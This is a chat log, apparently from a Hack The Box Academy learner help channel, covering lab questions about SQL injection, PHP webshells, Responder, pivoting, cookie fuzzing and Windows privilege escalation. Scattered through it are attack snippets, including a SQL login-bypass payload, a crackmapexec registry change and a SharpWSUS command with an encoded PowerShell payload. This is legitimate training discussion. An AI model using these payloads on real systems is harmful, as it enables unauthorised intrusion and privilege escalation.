Yes. A question about the section. I have put the .scf file in a few directories. So far nothing is happening. Trying to figure out how to get the other user to trigger opening the file
You can DM as to not spoil anything.
sure thing. thanks.
can i get some help with networking fundamentals module?
Which protocol manages data routing and delivery across networks?
i've done the whole module but this seem to not accept any syntax
not Internet protocol, IP/v4/v6, OSPF, BGP, RIP/V2, eigrp, igrp
none work
Good morning or evening
First question
How can I change id>1 to id=5
How to implement it in
.................................................................
| Admin panel
|
|Username. Unknown' OR '1'='1
|Password. Unknown' OR '1'='1
|
.................................................................
Second question
Instead of doing the entry in the space
.................................................................
https://125.0.0.1:3758 <--------------------- Here
.................................................................  |
| Admin panel                                                      |
|                                                                  |
| Username. ....                                                   |
| Password. ....                                                   |
|                                                                  |
.................................................................  |
Is it possible to inject directly in the URL ->--------------------|
SQL Injection Fundamentals
Using Comments
its Tcp/ip
does someone know the What type of network cable is used to transmit data over long distances with minimal signal loss? also in the network fundamentals - components of a network?
Same question..
optic-fiber
thank you so much my dude
optic-fiber , it's that damn hyphen
oooooh thanks
I swear... htb academy sometimes... Thanks a lot!
can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DC01. Can someone in DM check if I am doing this correctly or if I am missing something?
nope. Says exhausted
Sorry. Not a module. I am practicing for the cpts and I have an AD environment set up. I am literally the one who set the password and I'm going through the motions to make sure I'm doing things right. I even double checked...
yeah not sure tbh try john to see if its a hashcat issue
john doesn't see it either lol
you put it straight to a output file right?
only thing i can think of is the formatting
yeah. I'll do some more digging... but the format is good
sorry for the late reply did u get it?
Nah :/
Fiber-optic is the correct one sorry mate
i copy and pasted the correct answer from my screen
this syntax should work i think
YES THANKS
way to go my dude!
Hi, i got stuck on this question, someone can help me?:
Windows Event Logs & Finding Evil Module
Analyzing Windows Event Logs En Masse
Utilize the Get-WinEvent cmdlet to traverse all event logs located within the "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" directory and determine when the \*\PRINT share was added. Enter the time of the identified event in the format HH:MM:SS as your answer.
on CPTS exam is there a lot of time consuming password brute force? The module is hard takes a lot of time even when using the other services.... takes time even if I already know the password....
No one can answer that without revealing exam info. If it's in the path, you might see it in the exam
i uploaded a php webshell it is not executing php
that's odd if it doesn't work..
check the web if its running php
What module? Are you sure the extension is valid
module = attacking common services section = skill assessment easy
i am using wwwolf-php-webshell
I don't recall using a specialized shell, just basic php shell
i tried basic reverse shell . when going to the url it is downloading the shell and not executing it
Then are you sure that a revshell is the way? :)
If it's not executing a basic php shell, why would an advanced one work?
i reached to the forum and people there are saying they can execute commands via webshell so tried webshell
Everything you need to know to pass is given by the module
ok
Does anyone know if HTB asks me to pwn the machine through the Windows virtual box when I'm in a module? I connect with XFree, but when I spawn the IP from the last section, the Windows virtual box closes. Does anyone know why?
It's the buffer overflow module.
Stack-Based Buffer Overflows on Windows x86
When you spawn a target in a diff section it kills any other target
It's to prevent the servers from getting bogged down
Ok , but how do I connect it through the Windows Virtual Box?
You don't?
no , Tip: If you want to download the assessment.zip file to the Windows VM for debugging, right-click on the button below, and select 'Copy Link', then download it in PwnBox and copy it to the remote server.
in windows vm
and is a different section
I meant that you're not gonna be able to. Period
Not questioning that you haven't tried. Its just literally not possible to do so
Use your own windows machine/vm to compile and not rely on htb to spoonfeed you dev boxes
Hello, Iโm new to this field and trying to learn. I have a question:
Can I ask for help here in solving a certain machine, or is it not allowed?
Ok, tysm marciele
hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management
Don't reveal hashes for modules
Sorry about that
Hey everyone. Currently having issues with the following module because the box keeps going offline or something and won't respond to pings. This also happened for one of the previous tasks within the same module but was able to work around it by brute forcing the login with the attack box, however I'm not so fortunate this time around. So far I've used smtp-user-enum to get the user but now when trying to brute force the pw I get a bunch of connection related errors on both my personal kali VM + the Parrot attack-box from htb.
Module - Attacking Common Services - Skills Assessment - Easy
it'll respond to pings every once in awhile then when i try to resume from where i left off it just falls off again after a few seconds
i should also mention i've tried resetting the box prob 4 of 5 times now but no luck :/
Try a different VPN
My VPN too stops working after a while, so switching it just fixes it
this is working well so far for me. ty for the assist m8
All good bro!
Hey all, just starting my HTB journey. Is the Silver annual membership worth it? I definitely need some hand holding. I tried TryHackMe and wasn't a huge fan.
the walkthrough isn't really hand-holding so much as it is here's the solution it doesn't break it down at all
would be nice to have them be more explanatory but yk it is what it is
Agreed haha I'm not even tier 0 yet
imho the annual sub is worth it for the access to the walkthrough if you truly get stuck and swear you're doing the right thing
I would probably only get it if there is some sort of break down
I'm doing Linux fundamentals now and I know I need to read through everything, it is just overwhelming haha
quick question!
is this a thing: when you use sqlmap, identify the current user as dba which has file permissions... and then you cant read or write files.. but with the manual sqli, it works?
i have not confirmed that it works with the manual sqli, just wanna know if it's a possibility before i do it
In an assessment, like the one in the Documentation module, let's say I find 4 paths from unauthenticated user to Domain Admin, with different starting points (e.g. LLMNR poisoning, AS-REP roasting, weak local admin password, password in Description field), I assume I just need to pick one for the "Walkthrough" and use the others as "Findings". Are there any considerations as to which path is the one I should pick, given that they all start and finish in the same place, and would thus seem equally critical?
In web proxies skills assessment the question
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
i did select a position next to the cookie
and on payload processing i listed a prefix of the decoded cookie
and added both encodings in the reverse order
nothing is working tho every request is the same size
or should i md5 crack all 60 requests?
You should add the 31 characters as a prefix then re-encode with the reverse order
Your whole cookie should be replaced, not just the one character, if you check the requests you'll see why
what should i submit as my answer the cookie or
the decoded cookie?
since now i'm starting to get "Response Received" with various numbers unlike the first time
Check the response tab :)
Omg thank you so much i thought we should submit the cookie LOL
now i solved it thank you so much
Hi guys sorry for disorder, i have just finished the "Web Service & API attacks" module, and i have read on the forum that there is a way to finish the skill assessment with sqlmap. Can someone explain me please? because i have done it with a manual exploiting and i have also tried with sqlmap but it says me connection timeout and i don't know how to do.
Hi, I'm new silver membership too, have you done the setting up module? In the windows section it gives a link to download a set up windows vm, but I went to it and it said download unavailable....do you know where I can get something similar? I don't want to download something that's going to wreck my computer....thanks
Unfortunately microsoft has discontinued public support for the windows dev environments so you'll just have to download a normal windows iso, windows 10 for instance
ah, i see. thanks
Could also install windows server instead if you want to experiment with AD and stuff, though not required
why is like that if i run responder on pwnbox for llmnr poisoning it work but when i use my own machine it didn't give me any hashes...
even giving right interface..
Which module and section this for?
Depends on your host machine's config, there might be ports in use that responder cant use and make sure to run with sudo
like AD assessment part 2 . in that I pivot myself through given pwnbox to the internal network..
You mean you pivot through a target?
pivoting is gonna be hard to steal hashes passively without forwarding ports
yes
okay
hello
I've been using the Windows 11 Evaluation Edition (free/unrestricted use for 90 days) in VMWare Workstation Pro (also free): https://www.microsoft.com/en-us/evalcenter/evaluate-windows-11-enterprise
Hey everyone, This is my first time using Discord for Hack The Box - I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that it's on d***.w***.inlanefreight.htb:port. However, despite my attempts, I'm unable to locate it. I've used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated! Also, if anyone is working on the same labs and wants to collaborate and help each other out, feel free to reach out. Thanks in advance!
try ./req
Section: Windows Privilege Escalation Skills Assessment Part 1
Hi, I'm currently trying to escalate my privilege with JuicyPotato. I able to obtain the correct CLSID but somehow the nc from my attacker machine isn't receiving any connection.
I think you need to add a space
You might be running cmd/c nc.exe
what about in bash?
Need help on the Footprinting medium lab if anyone is here rn
no luck and I've also tried to craft a reverse_shell .bat to get reverse shell still receive nothing
SMB is not working like literally cannot connect due to "No workgroup available"
I should be doing everything correctly so im a tad lost
dm what you tried
what does the command look like
Can you please help me? My problem is that the exercise above doesn't seem to work correctly, as it returns incorrect results. Use your browser's developer tools to see what request it sends when searching, and use cURL to search for "flag" and get the flag. I tried to follow it step by step, but I can't find the flag.
which module and section is this?
web request
what have you tried so far?
ctrl + shift + e In the console try curl -u admin:admin (web page) -v
curl 'http://94.237.59.30:47822/script.js' -H 'Authorization: Basic YWRtaW46YWRtaW4='
and I entered the web page in the network and I can't find the search.php. Well, I don't know how to do it to see it. I checked each one in the network.
I'm trying to read the entire page in the console and I still can't find the flag or am I missing something?
php files are usually hidden since they're on the backend, try accessing it anyway and providing the search parameter the question tells you to
just tested it and it is in fact on the target you gave
I think I'm going to have to improve my comprehension when I read.
/search.php?search=$ cannot be...
Hello Guys, i'm new comer and doing setting up module, i'm bit shame about my question, I never download smthg from github, I would like to install pwndoc on windows, but not so easy, anyone to teach me this please ? thanks
Hi Guys so I'm doing the Getting Started module and in the Service Scanning section the only reason I know the user is because they give it to me but is there a way of getting that user and password? am I going to see that later one?
no shame in asking
download git for windows, and run git clone https://github.com/pwndoc/pwndoc
an easier way if you're on a linux is to clone the repo directly, zip it and transfer to your windows over a python http server
thanks man !
i'm not so familiar with Linux, have to practice with this one
follow the first part
Nobody is online right now that can help :/
Just be patient, what's your question?
It took me a while but finally I got this answer: curl -u admin:admin 94.237.59.30:41068/search.php?search=le
Leeds (UK)
Dudley (UK)
Leicester (UK)
Newcastle (UK)
Los Angeles (US)
Jacksonville (US)
Seattle (US) I thought I had it solved, I tried but failed again XDDDD
Read the question again
rsa key is not working
read and understand EVERY WORD
There an error? or something?
and i am almost absolutely certain i have it correctly pasted
without any ghost lines or anything
Now calm down xDD
permission denied (publickey) ; error in libcrypto
show command
ssh -i (file) user@ip
permissions for the rsa file is 600
so i dont think its that
you using the private key?
i found it on a mailbox a
all it contained was the key
im using pwnbox it should be i imagine
your key contains
----BEGIN
<RSAKEY>
---END
?
It needs to contain begin and end? oh hell that might be why
yes LOL
Sorry for making you angry xD
Dont paste flags
@fervent lantern don't share the flag :)))))))))))))))))))
- against ToS
- spoils for others
- allows others to just copy your answer without learning anything
won't make the mistake again
took you 7 hours to follow instructions that're all literally on the module?... mans gotta work on his comprehension fr
xd
yes xd
nah, not a ban (yet)
just a simple warning; we all get caught up in excitement
im almost certain this is the second time I've made this error but I caught it on the first go
then write it in your notes
I am doing the Login Brute Forcing module section Brute Force Attacks question "After successfully brute-forcing the PIN, what is the full flag the script returns?" Using pin-solver.py it brute forces pins 0000-9999 but its running so slow I don't think I will complete the brute force in time currently running at 200 attempts every 5 minutes. I tried using my home lab, pwnbox switching the vpns between tcp and udp. (Fixed seems running PWNBox on the US server did the trick, running Pwnbox on AU slow and running US VPN from oceania on my home lab was slow, reduced the rtt from 300ms to 150ms i.e 1000 req per 10 mins to about 1000 per 5mins after playing around a bit with the vpn make sure your latency to the vpn server is low (top right in pwnbox) had mine around 9ms and it ran super fast)
Unsure if there is something else at play that I am missing?
I see here it should take 3-5 minutes.
Hi all I am currently working on "AD Enumeration & Attacks - Skills Assessment Part II" and the sql01 seems to be offline via ping and port 1433 is this intended?
did you change the ip and port in the script?
Yes,
My ping rtt is 300ms would that impact it?
hey @fathom pendant This is my first time using Discord for Hack The Box - I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that it's on d.w.inlanefreight.htb:port. However, despite my attempts, I'm unable to locate it. I've used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated!
you shouldn't need to modify the ReconSpider tool
the one given by the module works just fine for outputting the results.json which would contain it
if you got the new api key; it would have been in the same results.json
:)
thank you so much so much
got it sorry about that
also ReconSpider gh tool is not the same as the ReconSpider.py tool in the module from creepy crawlies section
@main ridge are u sure the wifiphisher is the way for the second flag i am still stuck here but yet dont see any other way this would be achieved
yowhy cant i talk in general chat
Yes, used msfvenom linux payload, started netcat listener. Short connection was problem I had. So, when I started netcat listener, I immediately wrote cat flag.txt so flag printed immediately before shell connection was lost.
Been stuck with this for a week saw the solution that came out and for some reason it uses hostapd-mana for the ap and wifiphisher in conjunction and works perfectly. Can't understand how it solved my problem since that was that the connected clients didn't download the payload but it did.
Thanks though
Can someone help me with: Pki-esc1 , I was able to successfully get a cert.pem however I am unsure how to get the right one over to my Kali box in order to convert it, etc. Where would I find the updated cert.pem file on Bob and send it over to Kali.?
To whoever designed the shells&payloads skills assessment to require the use of RDP: I hate you 
all in all though good module.
I just used the kali machine they provide you in that module as a pivot and tunneled everything from my machine with ligolo.
Makes the module much nicer imo, I too hated rdp
Even sshuttle would work and its super fast to setup
hey i did dynamic port forwarding but why it not working , did i something wrong .
https://academy.hackthebox.com/module/158/section/1426
You can't use ICMP across proxychains.
It's not built for that.
How i get to know which things we can do and what we can't
Time/experience.
Another limitation is that it needs full packets, so a SYN scan from nmap won't work.
because it tries to ping it, and as we just discussed, it can't. you have to use -Pn (as it tells you)
ok got it .
hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management
bro what one machine gonna be <InternalIPofPivotHost> from these 3 .
middle one 1 guess??
does it show 22 in nmap scan?
yes
╭─kali@kali ~
╰─$ ssh mtanaka@10.129.203.105
Connection reset by 10.129.203.105 port 22
╭─kali@kali ~
╰─$ nmap 10.129.162.12810.129.203.105 255 ↵
╭─kali@kali ~
╰─$ nmap 10.129.203.105 255 ↵
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-14 14:28 CET
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.60% done; ETC: 14:28 (0:00:09 remaining)
Nmap scan report for 10.129.203.105
Host is up (0.084s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 6.19 seconds
The middle one is the pivot host and has both internal and external IPs
ok thz
Hey! Working on Legacy right now and struggling to get an exploit to work. New to all this, and some help would be greatly appreciated. Feel free to DM! Thanks
General question: how can responder (smb) work on servers where shares exist? Doesn't the share block port 445 so that the responder can not intercept hashes on 445?
better to use ligolo-ng pivoting tool, makes life so much easier.
what is the intended route for https://academy.hackthebox.com/module/77/section/859
or are you meant to get root before user
Actually good question, if you ever find out please @ me
It was a solution to one of the modules I just completed so I guess it just works and no one is wondering 🤷🏻‍♂️
In the PHP Web Shells module I cannot find the same Proxy Settings Connection settings anywhere, the only one I can find in burp suite is Settings/Tools/Proxy/Proxy listeners as it is not described how you got to Connection Settings> .... Found the answer by forwarding a few times as per the notes! Oops
Working on the skills assessment for Web Service and API attacks, I have the SOAP request and python script generated correctly. But cannot figure out how to inject. The script hangs when I run it without injection, but when I try to enter a payload I get syntax errors, I've tried every basic SQLi I can think of. Any tips or pointers?
guys ive been stuck on this module for like 2 whole days (using web proxies skills assessment). the question is: + 5 Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload): ive encoded the payload and added a prefix of the decoded cookie and then fuzzed with the burp intruder for 200 response but got nothing
Maybe I'm wrong but as far as I know the responder intercepts the authentication requests that computers make to resolve host names on the network and does not depend only on port 445, but also on 137, 138, 139 (NetBIOS) or 5355 (LLMNR).
Yeah but normal cifs services run on the same ports 🤔
Moreover the question: should you run responder on every endpoint you get admin access to even if it's on the same L2 network?
i found the problem. I just had to put the full path to the file. Thanks though
What would you guys recommend taking the exam of first
CBBH or CPTS?
i have both vouchers and idk which one to start with since when i finish CPTS i pretty much would be done with CBBH as well except for a few modules that i can do in a few days
?
they both have different focuses, so it's whichever you want first
I would focus more on understanding the module over speeding through it
Just look at the hint and do exactly what they say
after that look at the response and you should be done
Guys who knows how to transfer files from windows machine to linux?
Totally thats what im doing thats why ive been stuck in active directory module for 2 weeks i think lol
i did what they said
Look at the File transfer module
no response from the intruder
Then you did something wrong
i did it yesterday in Burp intruder
are you re-encoding the whole cookie? or just part of it
you should replace the whole cookie with your payload
after decoding the cookie u need to re-encode it again? they say encode only the payload
in the hint
it's part of the prefix
prefix starts the 31 char then the payload adds the last character then you re-encode in the reverse order you decoded
ive added the cookie to the prefix nothing else tbh
yea ik
First you should put the 31 long string as prefix
then you should encode it in reverse order of the previous question
and you should have the payload of alpha-num provided in the hint
After that you should get responses with different numbers in the "Response Received"
then look at the response and you should get the answer
i did it like this yesterday and it worked fine
ive added the string which is the decoded cookie, after that ive encoded the payload in reverse from the way i did before, then added the encoded payload to the payload config and sent it
how many payload processing do you have in the right side?
wdym
it should be more than one
^
you need to re-encode using the methods used to decode
For Example:
decode steps:
- base64
- hex
encode steps:
- hex
- base64
Its an example
oh .
same Decode/Encode as the question before it but in reverse order
what i said was an example, not the full steps to encode/decode to avoid spoilers
yeah that makes sense
can i send the encoded payload here so u can inspect it ?
cause it ends with ==
so i dont think its the correct one
decode steps a, b, c
encode steps c, b, a
and no, you can't, the module is above tier 0 so sharing anything related would be spoilers. My dms aren't open atm due to a handful of reasons
not to mention sharing stuff from skill assessments would be heavy spoilers
i would suggest reading the question again and trying everything from start again
usually works for me, you will realize that you missed something or did something wrong
been on this for 2 days, ive read it too many times at this point
because support isn't there to walk you through skill issues
i mean if you get a certification, it being a pseudonym wouldn't exactly be helpful for you, as far as changing it you're better off reaching out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
No company would accept a cert without a real name.
guys who knows commands for cookie extraction module provided not working
sqlite database
Alright lads, thanks! Deleting the posts. Sorry again
you didn't need to delete them lol
You'd be surprised how many servers are particularly butt hurt when you ask things in wrong channels
Hahaha
Sorry to ask since my english is not really good
Whats the difference? i thought these are the same
Certifications have more weight, basically
If you were disruptive that's a big difference
Certifications typically require exams
Certificates are generally just from participation/completion
Prolabs have certificates of completion
CBBH/CPTS/CDSA/CWEE/CAPE are certifications that require proof of knowledge to achieve
Thank you so much for clarification
Not to mention certification exams are required to do solo, you can work on prolabs with others
I'm a bit stuck on Q3 in this module https://academy.hackthebox.com/module/18/section/70
along with Q4 and Q6
have you tried calling a list of default variables from bash?
Can you explain please?
sometimes we would echo $PATH to verify the bash setting.
How to verify all the default variables with three characters?
"I'm stuck" isn't really helpful for others helping you
Are you ssh into the target system? Did you run some of the commands given and in the cheatsheet?
aye sorry. Yes I am ssh into the target and I can't find and don't know how to get the answers to the questions
env
Ohh thanks!
The module gives a list of commands and a brief description of them
env gives you environment variables
Environment variables are always full caps
ah makes sense thank you!
So you can always call it by typing echo ${varname}; i.e.
echo $SHELL or echo $MAIL
$ in bash signifies that you're calling a variable, so always be mindful
! is a history call
If you run into a password, for instance, that uses special characters, you'll want to wrap it in single quotes
'pa$$word!23'
i was exporting a webshell via mysql, where the secure_file_priv variable is empty, to the webroot of the xampp server running on windows, solving the easy skill assessment of the module attacking common services. when going to the url and running the webshell there is no output. i tried a normal echo statement to know if php is executing on it or not but still a blank white page
???
????
If you're uploading a webshell where it's looking for the 'c' variable you need to add ?c=(insert command here) for example ?c=id
Yeah probably should've done that
ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://academy.htb:PORT/
:: Wordlist : FUZZ: /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
mail2 [Status: 200, Size: 900, Words: 423, Lines: 56]
dns2 [Status: 200, Size: 900, Words: 423, Lines: 56]
ns3 [Status: 200, Size: 900, Words: 423, Lines: 56]
dns1 [Status: 200, Size: 900, Words: 423, Lines: 56]
lists [Status: 200, Size: 900, Words: 423, Lines: 56]
webmail [Status: 200, Size: 900, Words: 423, Lines: 56]
static [Status: 200, Size: 900, Words: 423, Lines: 56]
web [Status: 200, Size: 900, Words: 423, Lines: 56]
www1 [Status: 200, Size: 900, Words: 423, Lines: 56]
<...SNIP...>
in the module it says that we know those results are incorrect any idea why?
This is in the Vhost fuzzing in the FFUF module
Im following the CME command execution module and when i try to disable the localaccounttokenfilterpolicy as indicated in the module, i get a "it may be detected by AV" error. Anyone experience this? Thanks
┌─[us-academy-1]─[10.10.x.x]─[htb-ac-1524803@htb-3ktza9iasb]─[~]
└──╼ [★]$ crackmapexec smb 10.129.x.x -u Administrator -p [HIDDENPASS] --local-auth -x "reg add
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
SMB 10.129.x.x 445 MS01 [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
Look at the size/words/lines.
So its because they all look the same we know for sure its wrong?
yeah it is returning nothing, it is just a blank page
Ah i see thats why on the next section they did the -sf flag with 900
and thats how they knew for sure that the next results will be correct?
-fs*
Yeah, they likely have a default response page that responds to anything that isn't valid.
Not -sf
yeah sorry i only had a brief look at it since i didn't understand why these results were wrong
thank you all
-fs, filter (out) size
-ms, match size
For every -f[x] options there's a corresponding -m[x]
Anybody from staff can help with flawed VM created in module Web Attacks (Mass IDOR Enumeration)? Can describe issue in DM not to spoil
what do you mean flawed vm
basically on the very first step it's not working due to not creating any request that would be intercept-able via Burp upon clicking this link.
now the command is successfully executed . but only whoami and dir command are working
on forum people are saying bruteforcing load_file() but how can we bruteforce it
~~Looks like an issue on my end.~~Solved
Well it's a windows machine, so windows commands
i have a problem
i am in password attacks lab medium
i found some juicy stuff
in that ||doc|| a service is mentioned which doesn't run on that server
Not all services run externally
also, my guess is to login via localhost, but how the hell is that possible without ssh access
Are other remote access services open?
SMB and SSH only
Well, looks like ssh is open to me. Did you try passwords you may have obtained?
:)))))
Hi, I started htb few days ago and now im stuck at the brute forcing skills assessment 2, can someone give me some support or any idea, how to progress?
What path to what executable did you use as the SharpWSUS payload? Because this is doing absolutely nothing:
.\SharpWSUS.exe create /payload:"C:\Tools\SysinternalsSuite\PSExec64.exe" /args:"-accepteula -s -d powershell -e JABjAG<SNIP>AApAA==" /title:"NewAccountUpdate"
I have a question for the second to last question of the network foundations skill assessment. The FTP command used to retrieve a file is 'get' as far as I know. But 'get' doesn't solve the question. Format: XXXX also doesn't give me a hint as to how they want me to answer this.
There's another one that's more to do with the raw protocol
When you get a file you ________ it
got it thanks
or im stupid and missed something could also be highly possible
this is the smb module in the cpts path
anyway i rest my case
There's no "SMB" module, do you mean footprinting?
yes sry
There is in fact a way to get that answer
What's the module and section name
There's no "smb module" and there's a couple modules with smb related sections
i got the answer but not in the way its meant lol
Fucking hell my cell service made me late af to the convo
Connecting to the service is one way to enumerate beyond nmap, nmap isn't always 100%
Wait it isn't? I did it through nmap 
i tried every example they had in the text
im not expecting anyone to do this for me but just in case anyone is experiencing the same issue in the future
rpc should give you the correct answer as well, the smb version would be in the banner when you connect to the service, etc ¯\_(ツ)_/¯
literally so many options: nmap service/banner scan, rpcclient, nc, smbclient(not so sure bout this one)
Also deleted your message containing the answer because sharing answers isn't allowed.
(It took 5 business days to delete due to cell service)
ah
